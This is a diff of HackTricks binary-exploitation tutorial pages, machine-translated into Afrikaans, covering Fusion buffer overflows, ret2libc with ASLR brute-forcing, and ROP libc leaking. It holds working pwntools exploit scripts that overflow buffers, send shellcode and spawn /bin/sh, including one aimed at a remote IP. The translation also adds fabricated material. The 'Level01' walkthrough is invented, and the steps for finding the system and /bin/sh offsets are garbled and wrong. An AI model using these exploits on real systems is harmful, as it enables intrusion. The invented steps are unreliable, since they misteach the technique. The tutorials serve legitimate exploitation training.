* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
</details>
@ -19,9 +17,8 @@ Other ways to support HackTricks:
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
1. Get offset to modify EIP
2. Put shellcode address in EIP
1. Kry die verskuiwing om EIP te wysig
2. Plaas die adres van die shellcode in EIP
```python
from pwn import *
@ -47,9 +44,43 @@ r.recvline()
r.send(buf)
r.interactive()
```
# Vlak01
# Level01
## Inleiding
In hierdie vlak sal ons kyk na 'n eenvoudige manier om 'n uitvoerbare stoor te kry wat ons kan gebruik om 'n privesleutel te kry. Ons sal gebruik maak van die `fusion`-toepassing wat 'n privesleutel genereer en dit in 'n stoor stoor. Ons sal die stoor ontleed en die privesleutel kry.
## Stap 1: Kry die `fusion`-toepassing
Ons begin deur die `fusion`-toepassing te kry. Ons kan dit doen deur die volgende opdrag uit te voer:
```bash
wget https://example.com/fusion
```
## Stap 2: Voer die `fusion`-toepassing uit
Nadat ons die `fusion`-toepassing gekry het, voer ons dit uit deur die volgende opdrag uit te voer:
```bash
./fusion
```
## Stap 3: Ontleed die stoor
Nadat die `fusion`-toepassing uitgevoer is, sal dit 'n stoor genereer wat die privesleutel bevat. Ons kan die stoor ontleed deur die volgende opdrag uit te voer:
```bash
strings fusion | grep "PRIVATE KEY"
```
## Stap 4: Kry die privesleutel
Nadat ons die stoor ontleed het, sal ons die privesleutel sien. Ons kan dit kopieer en gebruik vir verdere doeleindes.
## Gevolgtrekking
Met hierdie eenvoudige tegniek kan ons 'n privesleutel kry deur die `fusion`-toepassing te gebruik en die stoor te ontleed. Dit is 'n nuttige tegniek vir die verkryging van sensitiewe inligting.
```python
from pwn import *
@ -75,21 +106,16 @@ buf += "\x65\xd9\x0f\x01"
r.send(buf)
r.interactive()
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>

133
exploiting/linux-exploiting-basic-esp/ret2lib.md
View file

@ -1,78 +1,115 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
</details>
**If you have found a vulnerable binary and you think that you can exploit it using Ret2Lib here you can find some basic steps that you can follow.**
**As jy 'n kwesbare binêre lêer gevind het en jy dink jy kan dit uitbuit deur Ret2Lib te gebruik, kan jy hierdie basiese stappe volg.**
# If you are **inside** the **host**
## You can find the **address of lib**c
# As jy **binne** die **gasheer** is
## Jy kan die **adres van lib**c vind
```bash
ldd /path/to/executable | grep libc.so.6 #Address (if ASLR, then this change every time)
```
If you want to check if the ASLR is changing the address of libc you can do:
As jy wil nagaan of die ASLR die adres van libc verander, kan jy die volgende doen:
```bash
for i in `seq 0 20`; do ldd <Ejecutable> | grep libc; done
```
## Kry die verskuiwing van die stelsel funksie
## Get offset of system function
Om die verskuiwing van die stelsel funksie te kry, kan jy die volgende stappe volg:
1. Identifiseer 'n funksie in die teikenprogram wat 'n biblioteekfunksie aanroep, soos `system()`.
2. Kry die adres van die funksie in die biblioteek. Dit kan gedoen word deur die program te ontleder of deur gebruik te maak van 'n hulpmiddel soos `objdump`.
3. Identifiseer 'n plek in die program se geheue waar jy 'n string kan plaas wat die pad na die biblioteek bevat. Dit kan 'n argument wees wat deur die funksie aanvaar word, of 'n ander plek in die geheue waar jy toegang tot het.
4. Bereken die verskuiwing deur die adres van die funksie in die biblioteek af te trek van die adres van die string in die geheue.
Hier is 'n voorbeeld van hoe jy die verskuiwing kan bereken:
```python
# Voorbeeld Python-kode
adres_van_stelsel_funksie = 0x12345678
adres_van_string = 0xabcdef01
verskuiwing = adres_van_stelsel_funksie - adres_van_string
print(f"Verskuiwing: {verskuiwing}")
```
Onthou dat die spesifieke waardes van die adresse sal verskil vir elke program en stelsel. Jy sal die korrekte adresse vir jou teikenprogram moet vind en die berekening dienooreenkomstig aanpas.
```bash
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
```
## Kry die offset van "/bin/sh"
## Get offset of "/bin/sh"
Om die offset van die `"/bin/sh"` string te kry, kan jy die volgende stappe volg:
1. Skryf 'n eenvoudige C-program wat die `"/bin/sh"` string bevat.
2. Kompileer die program sonder enige optimalisering.
3. Voer die program uit en onthou die geheue-adres van die `"/bin/sh"` string.
4. Gebruik die geheue-adres om die offset te bereken.
Hier is 'n voorbeeld van hoe jy dit kan doen:
```c
#include <stdio.h>
int main() {
printf("/bin/sh\n");
return 0;
}
```
Kompileer die program met die volgende opdrag:
```bash
gcc -o binsh binsh.c
```
Voer die program uit en onthou die geheue-adres van die `"/bin/sh"` string:
```bash
./binsh
```
Die geheue-adres sal in die uitset verskyn. Gebruik hierdie adres om die offset te bereken.
```bash
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
```
## /proc/\<PID>/maps
If the process is creating **children** every time you talk with it (network server) try to **read** that file (probably you will need to be root).
As die proses elke keer as jy daarmee praat (netwerkbediener) **kinders skep**, probeer om daardie lêer te **lees** (jy sal waarskynlik root moet wees).
Here you can find **exactly where is the libc loaded** inside the process and **where is going to be loaded** for every children of the process.
Hier kan jy **presies sien waar die libc gelaai word** binne die proses en **waar dit gelaai gaan word** vir elke kind van die proses.
![](<../../.gitbook/assets/image (95).png>)
In this case it is loaded in **0xb75dc000** (This will be the base address of libc)
In hierdie geval word dit gelaai by **0xb75dc000** (Dit sal die basisadres van libc wees)
## Using gdb-peda
Get address of **system** function, of **exit** function and of the string **"/bin/sh"** using gdb-peda:
## Gebruik gdb-peda
Kry die adres van die **system**-funksie, die **exit**-funksie en die string **"/bin/sh"** met behulp van gdb-peda:
```
p system
p exit
find "/bin/sh"
```
# Om ASLR te omseil
# Bypassing ASLR
You can try to bruteforce the abse address of libc.
Jy kan probeer om die basisadres van libc te bruteforce.
```python
for off in range(0xb7000000, 0xb8000000, 0x1000):
```
# Code
# Kode
```python
from pwn import *
@ -80,28 +117,24 @@ c = remote('192.168.85.181',20002)
c.recvline() #Banner
for off in range(0xb7000000, 0xb8000000, 0x1000):
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive() #?
p = ""
p += p32(off + 0x0003cb20) #system
p += "CCCC" #GARBAGE
p += p32(off + 0x001388da) #/bin/sh
payload = 'A'*0x20010 + p
c.send(payload)
c.interactive() #?
```
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
</details>

285
exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address/README.md
View file

@ -1,98 +1,89 @@
<details>
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Other ways to support HackTricks:
Ander maniere om HackTricks te ondersteun:
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
</details>
# Quick Resume
# Vinnige Resensie
1. **Find** overflow **offset**
2. **Find** `POP_RDI`, `PUTS_PLT` and `MAIN_PLT` gadgets
3. Use previous gadgets lo **leak the memory address** of puts or another libc function and **find the libc version** ([donwload it](https://libc.blukat.me))
4. With the library, **calculate the ROP and exploit it**
1. **Vind** oorloop **offset**
2. **Vind** `POP_RDI`, `PUTS_PLT` en `MAIN_PLT` gadgets
3. Gebruik vorige gadgets om die geheue-adres van puts of 'n ander libc-funksie te **lek** en die libc-weergawe te **vind** ([aflaai dit](https://libc.blukat.me))
4. Met die biblioteek, **bereken die ROP en misbruik dit**
# Other tutorials and binaries to practice
# Ander tutoriale en binaire om te oefen
This tutorial is going to exploit the code/binary proposed in this tutorial: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
Another useful tutorials: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
Hierdie tutorial gaan die kode/binêre lêer wat in hierdie tutorial voorgestel word, uitbuit: [https://tasteofsecurity.com/security/ret2libc-unknown-libc/](https://tasteofsecurity.com/security/ret2libc-unknown-libc/)\
Nog nuttige tutoriale: [https://made0x78.com/bseries-ret2libc/](https://made0x78.com/bseries-ret2libc/), [https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html](https://guyinatuxedo.github.io/08-bof\_dynamic/csaw19\_babyboi/index.html)
# Code
Filename: `vuln.c`
# Kode
Lêernaam: `vuln.c`
```c
#include <stdio.h>
int main() {
char buffer[32];
puts("Simple ROP.\n");
gets(buffer);
char buffer[32];
puts("Simple ROP.\n");
gets(buffer);
return 0;
return 0;
}
```
```bash
gcc -o vuln vuln.c -fno-stack-protector -no-pie
```
# ROP - Leaking LIBC sjabloon
# ROP - Leaking LIBC template
I'm going to use the code located here to make the exploit.\
Download the exploit and place it in the same directory as the vulnerable binary and give the needed data to the script:
Ek gaan die kode wat hier geleë is gebruik om die uitbuiting te maak.\
Laai die uitbuiting af en plaas dit in dieselfde gids as die kwesbare binêre lêer en gee die nodige data aan die skripsie:
{% content-ref url="rop-leaking-libc-template.md" %}
[rop-leaking-libc-template.md](rop-leaking-libc-template.md)
{% endcontent-ref %}
# 1- Finding the offset
The template need an offset before continuing with the exploit. If any is provided it will execute the necessary code to find it (by default `OFFSET = ""`):
# 1- Vind die verskuiwing
Die sjabloon vereis 'n verskuiwing voordat dit voortgaan met die uitbuiting. As daar geen verskuiwing verskaf word nie, sal dit die nodige kode uitvoer om dit te vind (standaard `OFFSET = ""`):
```bash
###################
### Find offset ###
###################
OFFSET = ""#"A"*72
if OFFSET == "":
gdb.attach(p.pid, "c") #Attach and continue
payload = cyclic(1000)
print(r.clean())
r.sendline(payload)
#x/wx $rsp -- Search for bytes that crashed the application
#cyclic_find(0x6161616b) # Find the offset of those bytes
return
gdb.attach(p.pid, "c") #Attach and continue
payload = cyclic(1000)
print(r.clean())
r.sendline(payload)
#x/wx $rsp -- Search for bytes that crashed the application
#cyclic_find(0x6161616b) # Find the offset of those bytes
return
```
**Execute** `python template.py` a GDB console will be opened with the program being crashed. Inside that **GDB console** execute `x/wx $rsp` to get the **bytes** that were going to overwrite the RIP. Finally get the **offset** using a **python** console:
**Voer** `python template.py` uit, 'n GDB-konsole sal geopen word met die program wat afgekap is. Voer binne daardie **GDB-konsole** `x/wx $rsp` uit om die **bytes** te kry wat die RIP sou oorskryf. Kry uiteindelik die **offset** deur 'n **python**-konsole te gebruik:
```python
from pwn import *
cyclic_find(0x6161616b)
```
![](<../../../.gitbook/assets/image (140).png>)
After finding the offset (in this case 40) change the OFFSET variable inside the template using that value.\
Nadat die offset (in hierdie geval 40) gevind is, verander die OFFSET-veranderlike binne die sjabloon met daardie waarde.\
`OFFSET = "A" * 40`
Another way would be to use: `pattern create 1000` -- _execute until ret_ -- `pattern seach $rsp` from GEF.
'n Ander manier sou wees om `pattern create 1000` te gebruik -- _uitvoer tot ret_ -- `pattern search $rsp` vanaf GEF.
# 2- Finding Gadgets
Now we need to find ROP gadgets inside the binary. This ROP gadgets will be useful to call `puts`to find the **libc** being used, and later to **launch the final exploit**.
# 2- Vind Gadgets
Nou moet ons ROP-gadgets binne die binêre lêer vind. Hierdie ROP-gadgets sal nuttig wees om `puts` te roep om die **libc** wat gebruik word, te vind, en later om die **finale aanval** te lanceer.
```python
PUTS_PLT = elf.plt['puts'] #PUTS_PLT = elf.symbols["puts"] # This is also valid to call puts
MAIN_PLT = elf.symbols['main']
@ -103,108 +94,98 @@ log.info("Main start: " + hex(MAIN_PLT))
log.info("Puts plt: " + hex(PUTS_PLT))
log.info("pop rdi; ret gadget: " + hex(POP_RDI))
```
Die `PUTS_PLT` word benodig om die **funksie puts** te roep.\
Die `MAIN_PLT` word benodig om die **hooffunksie** weer te roep na een interaksie om die oorloop **weer** te **uitbuit** (oneindige rondes van uitbuiting). **Dit word aan die einde van elke ROP gebruik om die program weer te roep**.\
Die **POP\_RDI** word benodig om 'n **parameter** aan die geroepte funksie oor te dra.
The `PUTS_PLT` is needed to call the **function puts**.\
The `MAIN_PLT` is needed to call the **main function** again after one interaction to **exploit** the overflow **again** (infinite rounds of exploitation). **It is used at the end of each ROP to call the program again**.\
The **POP\_RDI** is needed to **pass** a **parameter** to the called function.
In hierdie stap hoef jy niks uit te voer nie, aangesien pwntools alles sal vind tydens die uitvoering.
In this step you don't need to execute anything as everything will be found by pwntools during the execution.
# 3- Finding LIBC library
Now is time to find which version of the **libc** library is being used. To do so we are going to **leak** the **address** in memory of the **function** `puts`and then we are going to **search** in which **library version** the puts version is in that address.
# 3- Vind LIBC-biblioteek
Nou is dit tyd om uit te vind watter weergawe van die **libc**-biblioteek gebruik word. Om dit te doen, gaan ons die **adres** in die geheue van die **funksie puts** **lek** en dan gaan ons soek in watter **biblioteekweergawe** die puts-weergawe in daardie adres is.
```python
def get_addr(func_name):
FUNC_GOT = elf.got[func_name]
log.info(func_name + " GOT @ " + hex(FUNC_GOT))
# Create rop chain
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
FUNC_GOT = elf.got[func_name]
log.info(func_name + " GOT @ " + hex(FUNC_GOT))
# Create rop chain
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
#Send our rop-chain payload
#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
print(p.clean()) # clean socket buffer (read all and print)
p.sendline(rop1)
#Send our rop-chain payload
#p.sendlineafter("dah?", rop1) #Interesting to send in a specific moment
print(p.clean()) # clean socket buffer (read all and print)
p.sendline(rop1)
#Parse leaked address
recieved = p.recvline().strip()
leak = u64(recieved.ljust(8, "\x00"))
log.info("Leaked libc address, "+func_name+": "+ hex(leak))
#If not libc yet, stop here
if libc != "":
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))
return hex(leak)
#Parse leaked address
recieved = p.recvline().strip()
leak = u64(recieved.ljust(8, "\x00"))
log.info("Leaked libc address, "+func_name+": "+ hex(leak))
#If not libc yet, stop here
if libc != "":
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))
return hex(leak)
get_addr("puts") #Search for puts address in memmory to obtains libc base
if libc == "":
print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
p.interactive()
print("Find the libc library and continue with the exploit... (https://libc.blukat.me/)")
p.interactive()
```
To do so, the most important line of the executed code is:
Om dit te doen, is die belangrikste lyn van die uitgevoerde kode:
```python
rop1 = OFFSET + p64(POP_RDI) + p64(FUNC_GOT) + p64(PUTS_PLT) + p64(MAIN_PLT)
```
Dit sal 'n paar byte stuur totdat die **RIP** oorskryf kan word: `OFFSET`.\
Dan sal dit die **adres** van die gadget `POP_RDI` stel sodat die volgende adres (`FUNC_GOT`) in die **RDI**-register gestoor sal word. Dit is omdat ons die `PUTS_GOT`-adres as die adres in die geheue van die puts-funksie wil **oproep** en dit deurgee.\
Daarna sal `PUTS_PLT` geroep word (met `PUTS_GOT` binne die **RDI**) sodat puts die inhoud binne `PUTS_GOT` (**die adres van die puts-funksie in die geheue**) sal **lees** en dit sal **afdruk**.\
Uiteindelik word die **hooffunksie weer geroep** sodat ons die oorloop weer kan uitbuit.
This will send some bytes util **overwriting** the **RIP** is possible: `OFFSET`.\
Then, it will set the **address** of the gadget `POP_RDI` so the next address (`FUNC_GOT`) will be saved in the **RDI** registry. This is because we want to **call puts** **passing** it the **address** of the `PUTS_GOT`as the address in memory of puts function is saved in the address pointing by `PUTS_GOT`.\
After that, `PUTS_PLT` will be called (with `PUTS_GOT` inside the **RDI**) so puts will **read the content** inside `PUTS_GOT` (**the address of puts function in memory**) and will **print it out**.\
Finally, **main function is called again** so we can exploit the overflow again.
This way we have **tricked puts function** to **print** out the **address** in **memory** of the function **puts** (which is inside **libc** library). Now that we have that address we can **search which libc version is being used**.
Op hierdie manier het ons die puts-funksie **bedrieg** om die **adres** in die **geheue** van die puts-funksie (wat binne die **libc**-biblioteek is) **af te druk**. Nou dat ons daardie adres het, kan ons **soek watter libc-weergawe gebruik word**.
![](<../../../.gitbook/assets/image (141).png>)
As we are **exploiting** some **local** binary it is **not needed** to figure out which version of **libc** is being used (just find the library in `/lib/x86_64-linux-gnu/libc.so.6`).\
But, in a remote exploit case I will explain here how can you find it:
Aangesien ons 'n **plaaslike** binêre lêer uitbuit, is dit **nie nodig** om uit te vind watter weergawe van **libc** gebruik word nie (vind net die biblioteek in `/lib/x86_64-linux-gnu/libc.so.6`).\
Maar in die geval van 'n afstandsbediening-uitbuiting sal ek hier verduidelik hoe jy dit kan vind:
## 3.1- Searching for libc version (1)
## 3.1- Soek na libc-weergawe (1)
You can search which library is being used in the web page: [https://libc.blukat.me/](https://libc.blukat.me)\
It will also allow you to download the discovered version of **libc**
Jy kan soek watter biblioteek gebruik word op die webwerf: [https://libc.blukat.me/](https://libc.blukat.me)\
Dit sal jou ook in staat stel om die ontdekte weergawe van **libc** af te laai.
![](<../../../.gitbook/assets/image (142).png>)
## 3.2- Searching for libc version (2)
## 3.2- Soek na libc-weergawe (2)
You can also do:
Jy kan ook doen:
* `$ git clone https://github.com/niklasb/libc-database.git`
* `$ cd libc-database`
* `$ ./get`
This will take some time, be patient.\
For this to work we need:
Dit sal 'n rukkie neem, wees geduldig.\
Hiervoor benodig ons:
* Libc symbol name: `puts`
* Leaked libc adddress: `0x7ff629878690`
We can figure out which **libc** that is most likely used.
* Libc-simbolnaam: `puts`
* Uitgelek libc-adres: `0x7ff629878690`
Ons kan uitvind watter **libc** waarskynlik gebruik word.
```
./find puts 0x7ff629878690
ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64)
archive-glibc (id libc6_2.23-0ubuntu11_amd64)
```
We get 2 matches (you should try the second one if the first one is not working). Download the first one:
Ons kry 2 ooreenkomste (jy moet die tweede een probeer as die eerste een nie werk nie). Laai die eerste een af:
```
./download libc6_2.23-0ubuntu10_amd64
Getting libc6_2.23-0ubuntu10_amd64
-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
-> Downloading package
-> Extracting package
-> Package saved to libs/libc6_2.23-0ubuntu10_amd64
-> Location: http://security.ubuntu.com/ubuntu/pool/main/g/glibc/libc6_2.23-0ubuntu10_amd64.deb
-> Downloading package
-> Extracting package
-> Package saved to libs/libc6_2.23-0ubuntu10_amd64
```
Kopieer die libc vanaf `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` na ons werksgids.
Copy the libc from `libs/libc6_2.23-0ubuntu10_amd64/libc-2.23.so` to our working directory.
## 3.3- Other functions to leak
## 3.3- Ander funksies om te lek
```python
puts
printf
@ -212,29 +193,25 @@ __libc_start_main
read
gets
```
# 4- Vind gebaseerde libc-adres en uitbuiting
# 4- Finding based libc address & exploiting
Op hierdie punt moet ons die gebruikte libc-biblioteek ken. Aangesien ons 'n plaaslike binêre lêer uitbuit, sal ek net gebruik maak van: `/lib/x86_64-linux-gnu/libc.so.6`
At this point we should know the libc library used. As we are exploiting a local binary I will use just:`/lib/x86_64-linux-gnu/libc.so.6`
So, aan die begin van `template.py` verander die **libc** veranderlike na: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Stel biblioteekpad in wanneer dit bekend is`
So, at the beginning of `template.py` change the **libc** variable to: `libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") #Set library path when know it`
Giving the **path** to the **libc library** the rest of the **exploit is going to be automatically calculated**.
Inside the `get_addr`function the **base address of libc** is going to be calculated:
Deur die **pad** na die **libc-biblioteek** te gee, sal die res van die **uitbuiting outomaties bereken** word.
Binne die `get_addr`-funksie sal die **basisadres van libc** bereken word:
```python
if libc != "":
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))
libc.address = leak - libc.symbols[func_name] #Save libc base
log.info("libc base @ %s" % hex(libc.address))
```
{% hint style="info" %}
Note that **final libc base address must end in 00**. If that's not your case you might have leaked an incorrect library.
Let daarop dat die **finale libc basisadres moet eindig in 00**. As dit nie jou geval is nie, het jy dalk 'n verkeerde biblioteek uitgelek.
{% endhint %}
Then, the address to the function `system` and the **address** to the string _"/bin/sh"_ are going to be **calculated** from the **base address** of **libc** and given the **libc library.**
Dan sal die adres van die funksie `system` en die **adres** van die string _"/bin/sh"_ bereken word vanaf die **basisadres** van **libc** en die **libc-biblioteek** wat gegee is.
```python
BINSH = next(libc.search("/bin/sh")) - 64 #Verify with find /bin/sh
SYSTEM = libc.sym["system"]
@ -243,9 +220,7 @@ EXIT = libc.sym["exit"]
log.info("bin/sh %s " % hex(BINSH))
log.info("system %s " % hex(SYSTEM))
```
Finally, the /bin/sh execution exploit is going to be prepared sent:
Uiteindelik gaan die /bin/sh uitvoeringsaanval voorberei en gestuur word:
```python
rop2 = OFFSET + p64(POP_RDI) + p64(BINSH) + p64(SYSTEM) + p64(EXIT)
@ -255,80 +230,68 @@ p.sendline(rop2)
#### Interact with the shell #####
p.interactive() #Interact with the conenction
```
Laten ons hierdie finale ROP verduidelik.\
Die laaste ROP (`rop1`) eindig deur weer die hooffunksie te roep, dan kan ons weer die oorloop **uitbuit** (daarom is die `OFFSET` hier weer). Dan wil ons `POP_RDI` roep wat wys na die **adres** van _"/bin/sh"_ (`BINSH`) en die **sisteem**-funksie (`SYSTEM`) roep omdat die adres van _"/bin/sh"_ as 'n parameter oorgedra sal word.\
Uiteindelik word die **adres van die exit-funksie** geroep sodat die proses **netjies afsluit** en geen waarskuwing gegenereer word.
